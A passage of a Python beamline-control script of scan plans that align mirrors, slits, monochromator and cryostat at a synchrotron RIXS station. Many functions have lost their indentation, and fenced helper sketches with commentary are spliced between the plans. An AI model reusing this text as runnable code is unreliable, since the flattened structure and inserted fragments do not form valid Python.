x_stop= x_ideal - 12
num= 9 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
for s in range(num_scan):
uid = yield from count([rixscam],num=1)
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc.z = ' + str(x_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_cff_optimization(extra_md = '' ):
x_motor= pgm.cff
y_motor= pgm.en
y_val= 1085
x_ideal= 2.26
x_start= x_ideal -0.16 #0.04#
x_stop= x_ideal +0.08 #0.04#
num= 13 #5 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 4)
yield from mv (x_motor,x_val)
yield from sleep(5)
yield from mv (y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm.cff = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
#yield from mv(gvsc1,'close')
#uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
#yield from mv(gvsc1,'open')
# uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm.cff = ' + str(x_ideal) + '\n'#\
# #' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_cff_optimization_centroid(num_scan):
x_motor= pgm.cff
y_motor= pgm.en
y_val= 1085
x_ideal= 2.20
x_start= x_ideal -0.1 #0.04#
x_stop= x_ideal +0.1 #0.04#
num= 11 #5 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 4)
yield from mv (x_motor,x_val)
yield from sleep(5)
yield from mv (y_motor,y_val)
for s in range(num_scan):
uid = yield from count([rixscam],num=1)
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm.cff = ' + str(x_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_exit_slit_optimization(extra_md = '' ):
x_motor= extslt.vg
y_motor= pgm.en
y_val= 850.7
x_ideal= 10
x_start= x_ideal +70
x_stop= x_ideal
num= 8 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 4)
yield from mv (x_motor,x_val)
yield from sleep(5)
yield from mv (y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': extslt.vg = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
# uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': extslt.vg = ' + str(x_ideal) + '\n'#\
# #' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_motor1_rel_scan(motor1, ideal, plus, minus, pts, extra_md = '' ):
x_motor= motor1
x_ideal= ideal
x_start= x_ideal + plus
x_stop= x_ideal - minus
num= pts #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' scan {} {}'. format(motor1.name, extra_md)})
if uid is None:
uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_val) + '\n'#\
# # ' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
if uid is None:
uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_ideal) + '\n'#\
# #' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m7_pit():
x_motor=espgm.m7pit
x_start=5.6
x_stop=4.6
num=50
f_string=''
#yield from count([rixscam],num=1) #refresh CCD
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)
uid = yield from count([rixscam],num=1)
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m7_pit = ' + str(x_val) + '\n'
print (f_string)
yield from mv(gvbt1,'close')
def m1_check():
yield from mv(extslt.hg,20)
yield from rel_scan([qem07],m1.pit,-30,30,31, md = {'reason':'checking m1 before each cff'})
yield from mv(m1.pit,peaks.cen['gc_diag_grid'])
yield from mv(extslt.hg,150)
def post_3AAyag_align():
det=[sc_4]
x_axis=espgm.gr_pit
x_start=1
x_stop=5
x_num=21
y_axis=cryo.t
#y_start=64.33
y_start=65.09
y_stop=66.33
#y_num=51
y_num=32
for i in range(y_num):
y=y_start+i*(y_stop-y_start)/(y_num-1)
yield from mv(y_axis,y)
yield from scan(det,x_axis,x_start,x_stop,x_num)
#yield from mvr(x_axis, (x_start-x_stop)/(x_num-1)) # 2 lines added because scan is timing out
#yield from sleep(2.5) #
def lunch():
for i in range(1,5):
yield from mv(cryo.z,29+i)
yield from scan([qem11],pgm.en,850,860,51)
yield from mv(cryo.z,31)
for i in range(0,7):
yield from mv(cryo.y,34.5+i*0.5)
yield from scan([qem11],pgm.en,850,860,51)
yield from mv(cryo.y,36)
def m1_align():
m1x_init=1.05040
m1pit_init=1802
m1pit_start=1000
m1pit_step=250
for i in range(0,9):
yield from mv(m1.pit,m1pit_start+i*m1pit_step)
yield from scan([qem01,qem05],m1.x,-4,2,31)
yield from mv(m1.pit,m1pit_start)
def m1_align_fine():
m1x_init=0.28945 #0.46 #this is what I found, but this looks unused
m1pit_init=1934
m1pit_start=1800
m1pit_step=50
for i in range(0,7):
yield from mv(m1.x,0)
yield from mv(m1.pit,m1pit_start+i*m1pit_step)
yield from rel_scan([qem05],m1.x,-3.5,3.5,36)
yield from mv(m1.pit,m1pit_start)
#def m1_align_fine2(): ## MOVED to STANDARD-PLANS in Startup
# m1x_init=m1.x.user_readback.value
# m1pit_init=m1.pit.user_readback.value
# m1pit_step=50
# m1pit_start=m1pit_init-3*m1pit_step
# for i in range(0,7):
# yield from mv(m1.pit,m1pit_start+i*m1pit_step)
# yield from rel_scan([qem05],m1.x,-3.5,3.5,36)
# yield from mv(m1.pit,m1pit_start)
def find_energy():
pgm_m2_start=88.344903
pgm_gr_start=87.678349
yield from mv(pgm.m2_pit,pgm_m2_start)
yield from mv(pgm.gr_pit,pgm_gr_start)
yield from relative_inner_product_scan([qem07],451,pgm.m2_pit,-2,1.0,pgm.gr_pit,-2,1.0)
yield from sleep(60)
yield from mv(pgm.m2_pit,pgm_m2_start)
yield from mv(pgm.gr_pit,pgm_gr_start)
yield from scan([qem07],epu1.gap,20,55,141)
def m1m3_max():
temp_extslt_vg=extslt.vg.user_readback.value
temp_extslt_hg=extslt.hg.user_readback.value
yield from gcdiag.grid
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,20)
yield from relative_scan([qem07],m1.pit,-30,30,31)
yield from mv(m1.pit,peaks['cen']['gc_diag_grid'])
yield from sleep(10)
yield from relative_scan([qem07],m3.pit,-0.0005,0.0005,31)
yield from mv(m3.pit,peaks['cen']['gc_diag_grid'])
yield from mv(extslt.hg,temp_extslt_hg)
yield from mv(extslt.vg,temp_extslt_vg)
yield from gcdiag.out
def m3_tune():
    #extslt_hg=0.12
    #extslt_vg=0.1
    m3_pit_start=-0.754240
    m3_x_start=3.4
    m3_pit_step=1
    m3_x_step=1
    for i in range(0,10):
        yield from mv(m3.pit,m3_pit_start-m3_pit_step)
        yield from sleep(10)
        yield from mv(m3.pit,m3_pit_start)
        yield from sleep(10)
        yield from relative_scan([qem07],extslt.hc,-1,1,201)
    for i in range(0,10):
        yield from mv(m3.x,m3_x_start-m3_x_step)
        yield from sleep(10)
        yield from mv(m3.x,m3_x_start)
        yield from sleep(10)
        yield from relative_scan([qem07],extslt.hc,-1,1,201)
    for i in range(0,10):
        yield from mv(m3.pit,m3_pit_start+m3_pit_step)
        yield from sleep(10)
        yield from mv(m3.pit,m3_pit_start)
        yield from sleep(10)
        yield from relative_scan([qem07],extslt.hc,-1,1,201)
    for i in range(0,10):
        yield from mv(m3.x,m3_x_start+m3_x_step)
        yield from sleep(10)
        yield from mv(m3.x,m3_x_start)
        yield from sleep(10)
        yield from relative_scan([qem07],extslt.hc,-1,1,201)
    for i in range(0,50):
        yield from sleep(600)
        yield from relative_scan([qem07],extslt.hc,-1,1,201)
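# m3_tune repeats the same "kick the motor off its rest position, return,
# settle, scan" block four times with different signs and axes. A hedged sketch
# of expressing that move sequence as data (backlash_cycle is our name):

```python
def backlash_cycle(rest, excursion, repeats):
    """Yield (label, position) pairs for a kick-and-return stability test."""
    for _ in range(repeats):
        yield ('kick', rest + excursion)
        yield ('rest', rest)

moves = list(backlash_cycle(rest=-0.754240, excursion=-1, repeats=2))
print(moves)
```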
def m3_focus():
    m3_pit_start=-0.754240
    extslt_hc_start=-3.68615
    for i in range(0,30):
        yield from mv(m3.pit,m3_pit_start-0.00072*i)
        yield from mv(extslt.hg,40)
        yield from relative_scan([qem07],extslt.hc,-0.4,0.4,21)
        yield from mv(extslt.hc,peaks['max']['gc_diag_diode'][0])
        yield from sleep(5)
        yield from mv(extslt.hg,6)
        yield from relative_scan([qem07],extslt.hc,-0.12,0.12,41)
        yield from mv(extslt.hc,peaks['cen']['gc_diag_diode']-0.2)
def m3_stability_focus():
m3_pit_start=-0.754240
extslt_hc_start=-3.71405
yield from mv(extslt.hg,10)
for i in range(0,30):
yield from relative_scan([qem07],extslt.hc,-0.4,0.4,81)
yield from mv(extslt.hc,peaks['cen']['gc_diag_diode'])
yield from sleep(900)
for i in range(0,30):
yield from mv(m3.pit,m3_pit_start-0.00072*i)
yield from mv(extslt.hg,40)
yield from relative_scan([qem07],extslt.hc,-0.4,0.4,21)
yield from mv(extslt.hc,peaks['max']['gc_diag_diode'][0])
yield from sleep(5)
yield from mv(extslt.hg,6)
yield from relative_scan([qem07],extslt.hc,-0.12,0.12,41)
yield from mv(extslt.hc,peaks['cen']['gc_diag_diode']-0.2)
def find_center_of_rot():
    ow_start = 39.45
    ow_step = 0.01
    m4pit_start = -4.0435
    m4pit_step = 0.005
    for i in range(0,30):
        yield from mv(m4.pit,m4pit_start-i*m4pit_step)
        yield from sleep(10)
        print('Current cycle number: {}'.format(i))
        yield from scan([qem11],ow,ow_start-25*ow_step,ow_start+25*ow_step,51)
        yield from sleep(10)
def center_of_rot():
yield from mv(epu1.gap,41.2)
yield from mv(pgm.en,930)
#yield from mv(cryo.y,100)
#yield from mv(cryo.x,50)
#yield from mv(ow,39.75)
for i in range(0,25):
yield from mv(m4.x,3.6+0.1*(i-12))
yield from sleep(10)
yield from scan([qem10,qem11],m4.pit,-4.21,-4.15,121)
#yield from scan([qem10,qem11],m4.pit,-4.145,-4.115,61)
yield from sleep(30)
yield from mv(m4.x,3.6)
def center_of_rot_coordinated():
yield from mv(epu1.gap,41.2)
yield from mv(pgm.en,930)
#yield from mv(cryo.y,100)
#yield from mv(cryo.x,50)
#yield from mv(ow,39.5)
for i in range(0,6):
yield from mv(m4.x,3.6+0.1*(i+5))
yield from mv(extslt.hc,-5.03560+0.057*(i+5))
yield from mv(m3.pit,-0.753135+0.000204*(i+5))
yield from sleep(10)
yield from scan([qem10,qem11],m4.pit,-4.220,-4.20,41)
#yield from scan([qem10,qem11],m4.pit,-4.145,-4.115,61)
yield from sleep(30)
yield from mv(m4.x,3.6)
yield from mv(m3.pit,-0.753135)
yield from mv(extslt.hc,-5.03560)
def center_of_rot_yaw():
yield from mv(epu1.gap,41.00)
yield from mv(pgm.en,930)
#yield from mv(cryo.y,100)
#yield from mv(cryo.x,50)
#yield from mv(ow,39.75)
yield from mv(m4.x,1.2)
for i in range(0,10):
yield from mv(m4.yaw,-1.48-0.01*i)
yield from sleep(10)
yield from scan([qem10,qem11],m4.pit,-4.21,-4.15,121)
#yield from scan([qem10,qem11],m4.pit,-4.145,-4.115,61)
yield from sleep(30)
yield from mv(m4.yaw,-1.1850)
def epu_calib_left():
    yield from mv(epu1.phase, 28.5)
    d = [qem07]
    #FE slit H and V gap to 1.2 mm
    yield from mv(feslt.hg,1.5)
    yield from mv(feslt.vg,1.5)
    yield from mv(pgm.cff,2.330)
    yield from sleep(100)
    #3rd Harmonic
    for i in range(1400,1601,50):
        calc_gap=e2g(i/3)
        yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
        yield from sleep(10)
        yield from relative_scan(d,epu1.gap,0,2,30)
        yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
        yield from sleep(10)
        yield from relative_scan(d,epu1.gap,0,1.0,75)
def m4_yaw_roll():
    #cryo.x.settle_time=0.2
    #cryo.y.settle_time=0.2
    #r_md = 'V beam with yaw roll'
    #yield from mv(extslt.vg,30)
    #yield from mv(extslt.hg,150)
    #yield from mv(epu1.gap,40.8) # detuned
    #yield from mv(cryo.x,33.50)
    # mir4_rol_init = 1.421
    # mir4_rol_step= 0.002
    mir4_yaw_init = -0.7064
    mir4_yaw_step = 0.0003 #0.002
    for i in range(-5,6):
        yield from mv(m4.yaw, mir4_yaw_init + mir4_yaw_step * (1 * i))
        #yield from mv(m4.rol,mir4_rol_init+mir4_rol_step*(1*i))
        #yield from mv(cryo.x,39.0)
        yield from mv(cryo.y,90.010) # to be adjusted
        yield from sleep(5)
        yield from rel_scan([sclr],cryo.y,0,0.03,91)
        #yield from rel_scan([sclr],cryo.y,0,0.04,121, md={'reason':r_md})
def pitch_and_yaw():
    cryo.x.settle_time=0.2
    cryo.y.settle_time=0.2
    #yield from mv(extslt.hg,150)
    mir4_pit_init = -4.1027
    mir4_pit_step = -0.0003
    for i in range(0,6):
        yield from mv(m4.pit, mir4_pit_init + mir4_pit_step * (1 * i))
        yield from m4_yaw_roll()
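# pitch_and_yaw nests a 6-point pitch sweep around the 11-point yaw sweep in
# m4_yaw_roll, i.e. a 66-point 2-D grid. The implied grid can be enumerated
# with itertools.product (a sketch; parameter names are ours):

```python
from itertools import product

def grid_setpoints(pit_init, pit_step, n_pit, yaw_init, yaw_step, yaw_indices):
    """All (pitch, yaw) pairs visited by the nested sweeps."""
    pits = [pit_init + pit_step * i for i in range(n_pit)]
    yaws = [yaw_init + yaw_step * i for i in yaw_indices]
    return list(product(pits, yaws))

pairs = grid_setpoints(-4.1027, -0.0003, 6, -0.7064, 0.0003, range(-5, 6))
print(len(pairs))  # 6 pitch x 11 yaw = 66 combinations
```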
def m4_y():
    yield from mv(extslt.vg,20)
    yield from mv(extslt.hg,300)
    yield from mv(epu1.gap,40.8) # detuned
    #yield from mv(cryo.x,33.50)
    mir4_y_init = 96.875
    mir4_y_step= 0.05
    for i in range(1, 7):
        yield from mv(m4.y,mir4_y_init+mir4_y_step*(1*i-3))
        yield from mv(cryo.x,39.3)
        yield from mv(cryo.y,94.47)
        yield from sleep(10)
        yield from relative_scan([sclr],cryo.y,0,0.15,31)
def m4_pit():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
#yield from mv(extslt.vg,30)
yield from mv(extslt.hg,150)
#yield from mv(epu1.gap,40.8) #detuned EPU @930 eV
mir4_pit_init = -4.1024
mir4_pit_step= 0.0003 #0.001
for i in range(-7, 8):
yield from mv(m4.pit,mir4_pit_init+1*mir4_pit_step*(1*i))
#yield from mv(cryo.x,37.8)
yield from mv(cryo.y,90.152) # to be adjusted
yield from sleep(10)
yield from relative_scan([sclr],cryo.y,0,0.02,41)
#yield from relative_scan([sclr],cryo.y,0,0.10,31)
#yield from mv(cryo.y,97.5)
#yield from mv(cryo.x,43.350+0.08*(1*i))
#yield from mv(cryo.x,42.7) # to be adjusted
#yield from sleep(30)
#yield from relative_scan(d11,cryo.x,0,0.4,121)
def m4_z():
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,150)
#yield from mv(epu1.gap,40.8) #detuned EPU @930 eV
mir4_z_init = -5.4
mir4_z_step= 0.1
for i in range(0, 15):
yield from mv(m4.z,mir4_z_init+mir4_z_step*(1*i-7))
yield from mv(cryo.x,40)
yield from mv(cryo.y,94.44-0.01*(i-7))
yield from sleep(10)
yield from relative_scan([sclr],cryo.y,0,0.1,31)
#yield from mv(cryo.y,98.0)
#yield from mv(cryo.x,42.7-(1*i-5)*0.028)
#yield from mv(cryo.x,42.7)
#yield from sleep(30)
#yield from relative_scan(d11,cryo.x,0,0.4,121)
def m4_z_pit():
    start_scan_id=None
    total_num_scans=110
    cryo.x.settle_time=0.2
    cryo.y.settle_time=0.2
    d11 = [qem11]
    yield from mv(extslt.vg,30)
    yield from mv(extslt.hg,300)
    #yield from mv(epu1.gap,38) #detuned EPU @852 eV
    mir4_z_init = -1.4
    mir4_z_step= 0.5
    mir4_pit_init = -4.085
    mir4_pit_step= 0.003
    for i in range(0, 5):
        yield from mv(m4.z,mir4_z_init+mir4_z_step*(1*i-2))
        yield from sleep(30)
        for j in range(0, 11):  # inner loop renamed from i to avoid shadowing
            yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*j-5))
            yield from sleep(30)
            yield from mv(cryo.y,97)
            yield from mv(cryo.x,43.05+0.1*(1*j-5)) # to be adjusted
            yield from sleep(30)
            uid = yield from relative_scan(d11,cryo.x,0,0.5,101)
            if uid is not None and start_scan_id is None:
                start_scan_id = db[uid].start['scan_id']
            if start_scan_id is not None: current_plan_time(start_scan_id,total_num_scans)
            yield from mv(cryo.x,42)
            yield from mv(cryo.y,97.6) # to be adjusted
            yield from sleep(30)
            yield from relative_scan(d11,cryo.y,0,0.4,121)
            if start_scan_id is not None: current_plan_time(start_scan_id,total_num_scans)
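# m4_z_pit records the scan_id of its first scan and calls current_plan_time()
# to report progress against total_num_scans. A pure-python sketch of such an
# estimator (PlanETA is our name; the profile's actual helper may differ):

```python
import time

class PlanETA:
    """Rough remaining-time estimate from scans completed so far."""
    def __init__(self, total_scans, clock=time.monotonic):
        self.total = total_scans
        self.done = 0
        self.clock = clock
        self.t0 = clock()

    def tick(self):
        """Record one finished scan; return estimated seconds remaining."""
        self.done += 1
        per_scan = (self.clock() - self.t0) / self.done
        return per_scan * (self.total - self.done)

# Simulated clock: construction at t=0, scans finish at t=10 and t=20.
fake_t = iter([0.0, 10.0, 20.0])
eta = PlanETA(total_scans=4, clock=lambda: next(fake_t))
print(eta.tick(), eta.tick())  # 30.0 20.0
```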
def m4_z_pit_2():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
d11 = [qem11]
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,300)
#yield from mv(epu1.gap,38) #detuned EPU @852 eV
mir4_z_init = -5.4
mir4_z_step= 0.5
mir4_pit_init = -4.061
mir4_pit_step= 0.003
#for i in range(0, 5):
#yield from mv(m4.z,mir4_z_init+mir4_z_step*(1*i-2))
#yield from sleep(30)
for i in range(0, 7):
yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*i-3))
yield from sleep(5)
yield from mv(cryo.y,96.28) # to be adjusted
yield from sleep(10)
yield from relative_scan(d11,cryo.y,0,0.2,61)
def m4_x():
    d11 = [qem11]
    yield from mv(extslt.vg,10)
    yield from mv(extslt.hg,3000)
    yield from mv(epu1.gap,40.7) # detuned
    #yield from mv(cryo.x,33.50)
    mir4_x_init = 3.2
    extslt_hc_init = -4.106
    mir3_pit_init = -0.751240
    mir4_x_step= 0.1
    mir3_pit_step=0.0002164 # +5.55% correction with respect to theoretical 0.00205
    extslt_hc_step=0.05715
    for i in range(0, 11):
        yield from mv(m4.x,mir4_x_init+mir4_x_step*(1*i-5))
        yield from mv(extslt.hc,extslt_hc_init+extslt_hc_step*(1*i-5))
        yield from mv(m3.pit,mir3_pit_init+mir3_pit_step*(1*i-5))
        yield from sleep(30)
        yield from mv(cryo.x,36)
        yield from mv(cryo.y,98.6)
        yield from sleep(30)
        yield from scan(d11,cryo.y,98.5,98.8,91)
        yield from mv(cryo.y,98.0)
        yield from mv(cryo.x,+(1*i-5)*0.1)
        yield from sleep(30)
        yield from scan(d11,cryo.x,37.5+(1*i-5)*0.1,37.8+(1*i-5)*0.1,91)
def m4_vexitslt_focus():
    #d11=[qem11]
    d11=[sclr]
    extslt_ini=5
    extslt_final=42.5
    extslt_step=2.5
    for i in range(0, 1+round(abs(extslt_ini-extslt_final)/extslt_step)):
        yield from mv(extslt.vg,extslt_ini+i*extslt_step)
        #yield from sleep(5)
        #yield from mv(cryo.x,40.6)
        yield from mv(cryo.y,67.065) # to be adjusted
        yield from sleep(1)
        yield from relative_scan([sclr],cryo.y,0,0.015,46)
        #yield from mv(cryo.y,98)
        #yield from mv(cryo.x,43.2) # to be adjusted
        #yield from sleep(30)
        #yield from relative_scan(d11,cryo.x,0,0.4,151)
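# m4_vexitslt_focus derives its point count as 1 + round(abs(ini-final)/step).
# The same formula as a reusable helper (inclusive_positions is our name):

```python
def inclusive_positions(start, stop, step):
    """Evenly spaced positions from start to stop, endpoints included."""
    n = 1 + round(abs(start - stop) / step)
    return [start + i * step for i in range(n)]

print(inclusive_positions(5, 42.5, 2.5))  # 16 gap settings, 5.0 ... 42.5
```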
def m4_depth_of_focus():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,150)
cryo_z_init = 0.1#-0.8
cryo_z_step= 0.15
v_focus_x = 37.65
v_focus_y = 89.950
for i in range(-6, 21): #-15, 16
yield from mv(cryo.z,cryo_z_init + cryo_z_step * (1 * i))
yield from mv(cryo.x, v_focus_x)
yield from mv(cryo.y, v_focus_y)
yield from sleep(5)
print('\n\n\t\tMoved cryo.z for i = {}\n\n'.format(i))
yield from rel_scan([sclr],cryo.y,0,0.035,106)
yield from mv(cryo.z,cryo_z_init)
cryo_x_init = 38.45
yield from mv(cryo.y,88.9550)
x_offset = -0.014
c = 0
#yield from mv(cryo.x,38.42)
for i in range(-6, 21): #-15, 16
c = c + 1
yield from mv(cryo.z, cryo_z_init + cryo_z_step * (1 * i))
yield from mv(cryo.x, cryo_x_init + c * x_offset)
#yield from mv(cryo.x,cryo_x_init)
yield from sleep(5)
print('\n\n\t\tMoved cryo.z for i = {}\n\n'.format(i))
yield from rel_scan([sclr],cryo.x,0,0.2,201)
def m4_cryo_x_vfocus():
d11=[qem11]
cryo_x_ini=34
cryo_x_final=38
cryo_x_step=0.25
for i in range(0, 1+round(abs(cryo_x_ini-cryo_x_final)/cryo_x_step)):
yield from mv(cryo.x,cryo_x_ini+i*cryo_x_step)
yield from sleep(10)
yield from mv(cryo.y,95.91) # to be adjusted
yield from rel_scan([qem11],cryo.y,-2,0.2,23)
yield from mv(cryo.y,peaks['cen']['sc_diode_1'])
yield from sleep(10)
yield from relative_scan(d11,cryo.y,-0.15,0.15,91)
def m4_m3_x():
    d11 = [qem11]
    yield from mv(extslt.vg,30)
    yield from mv(extslt.hg,3000)
    yield from mv(epu1.gap,38) # detuned
    #yield from mv(cryo.x,33.50)
    mir4_x_init = 3.2
    extslt_hc_init = -4.106
    mir3_pit_init = -0.747875
    mir1_pit_init = 1932.537
    mir3_x_init=1.2
    mir3_x_step= 0.5
    mir3_pit_step=-0.00108 # +5.55% correction with respect to theoretical 0.00101
    extslt_hc_step=0.2857
    mir1_pit_step=4.52
    for i in range(0, 11):
        yield from mv(m1.pit,mir1_pit_init+mir1_pit_step*(1*i-5))
        yield from sleep(30)
        yield from mv(m3.x,mir3_x_init+mir3_x_step*(1*i-5))
        yield from mv(extslt.hc,extslt_hc_init+extslt_hc_step*(1*i-5))
        yield from mv(m3.pit,mir3_pit_init+mir3_pit_step*(1*i-5))
        mir4_pit_init = -4.069
        mir4_pit_step= 0.003
        for j in range(0, 5):
            yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*j-2))
            yield from sleep(30)
            yield from mv(cryo.x,42)
            yield from mv(cryo.y,97.55)
            yield from sleep(30)
            yield from rel_scan(d11,cryo.y,0,0.4,121)
            yield from mv(cryo.y,97.0)
            yield from mv(cryo.x,37.4+0.1*(1*j-2)+0.038*(1*i-6))
            yield from sleep(30)
            yield from rel_scan(d11,cryo.x,0,0.5,121)
def m4_extslt_scan():
d11 = [qem11]
yield from mv(cryo.x,32.7)
yield from mv(cryo.z,5.5)
for i in range(0, 9):
yield from mv(cryo.y,98)
yield from mv(epu1.gap,40.9-i*0.0055*5)
yield from sleep(10)
yield from mv(extslt.vg,5+i*5)
yield from sleep(10)
yield from scan(d11,cryo.y,98,98.5,150)
for i in range(0, 6):
yield from mv(cryo.y,98)
yield from mv(epu1.gap,40.64-i*0.00535*10)
yield from sleep(10)
yield from mv(extslt.vg,50+i*10)
yield from sleep(10)
yield from scan(d11,cryo.y,98,98.5,150)
def beam_profile():
d11 = [qem11]
yield from mv(cryo.y,97.2)
for i in range(0, 21):
yield from mv(cryo.x,36.7-0.07*i)
yield from sleep(10)
yield from mv(cryo.z,0.5+i)
yield from sleep(10)
yield from scan(d11,cryo.x,36.7-0.07*i,37.7-0.07*i,300)
#yield from mv(cryo.y,97.6)
#for i in range(0, 21):
#yield from mv(cryo.x,36.7-0.07*i)
#yield from sleep(10)
#yield from mv(cryo.z,0.5+i)
#yield from sleep(10)
#yield from scan(d11,cryo.x,36.7-0.07*i,37.7-0.07*i,300)
#yield from mv(cryo.x,33.5)
#for i in range(0, 21):
#yield from mv(cryo.y,97.85)
#yield from sleep(10)
#yield from mv(cryo.z,0.5+i)
#yield from sleep(10)
#yield from scan(d11,cryo.y,97.85,98.65,267)
#yield from mv(cryo.y,98)
#for i in range(0, 21):
#yield from mv(cryo.x,36.7-0.07*i)
#yield from sleep(10)
#yield from mv(cryo.z,0.5+i)
#yield from sleep(10)
#yield from scan(d11,cryo.x,36.7-0.07*i,37.7-0.07*i,300)
def beam_profile_vs_cryox():
d11 = [qem11]
yield from mv(cryo.x,30)
yield from mv(cryo.z,5.5)
yield from mv(epu1.gap,40.9)
for i in range(0, 61):
yield from mv(cryo.y,98)
yield from sleep(10)
yield from mv(cryo.x,30+i*0.1)
yield from sleep(30)
yield from scan(d11,cryo.y,98,98.5,200)
yield from mv(extslt.vg,30)
yield from mv(epu1.gap,40.75)
for i in range(0, 61):
yield from mv(cryo.y,98)
yield from sleep(10)
yield from mv(cryo.x,30+i*0.1)
yield from sleep(30)
yield from scan(d11,cryo.y,98,98.5,200)
def beam_profile_at_cor():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
yield from gcd_out()
d11 = [qem11]
mir4_pit_init = -4.1709
mir4_x_init = 2.675
mir4_y_init = 98.44
mir3_pit_init=-0.743510
extslt_hc_init=-5.22910
mir4_x_step= 1
mir4_pit_step=-0.0266 #-0.0307/4
mir3_pit_step=0.002164 # +5.55% correction with respect to theoretical 0.00205
extslt_hc_step=0.57
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,200)
yield from mv(epu1.gap,40.7) #detuned
for i in range(0, 25):
yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*i-12))
yield from mv(m4.x,mir4_x_init+mir4_x_step*(1*i-12))
yield from mv(extslt.hc,extslt_hc_init+extslt_hc_step*(1*i-12))
yield from mv(m3.pit,mir3_pit_init+mir3_pit_step*(1*i-12))
yield from sleep(30)
yield from mv(cryo.x,29.2)
yield from mv(cryo.y,99.3)
yield from sleep(30)
yield from scan(d11,cryo.y,99.3,100.1,161)
yield from mv(cryo.y,98.4)
yield from mv(cryo.x,32.4)
yield from sleep(30)
yield from scan(d11,cryo.x,32.4,33.4,201)
def beam_profile_vs_m3x():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
from epics import caget, caput
yield from gcd_out()
d11 = [qem11]
mir1_pit_init=1857.5
mir3_pit_init= -0.75975
mir3_x_init = 1.8
mir4_pit_init = -4.11070
mir4_x_init = 0.3
mir4_y_init = 98.95
extslt_hc_init= -6.8892
step_m3x= 1.4/4
step_m3pit= -0.00155/4 #-0.0028647/8
step_m4pit= -0.0028647/4
step_extslt_hc= 0.5998/4
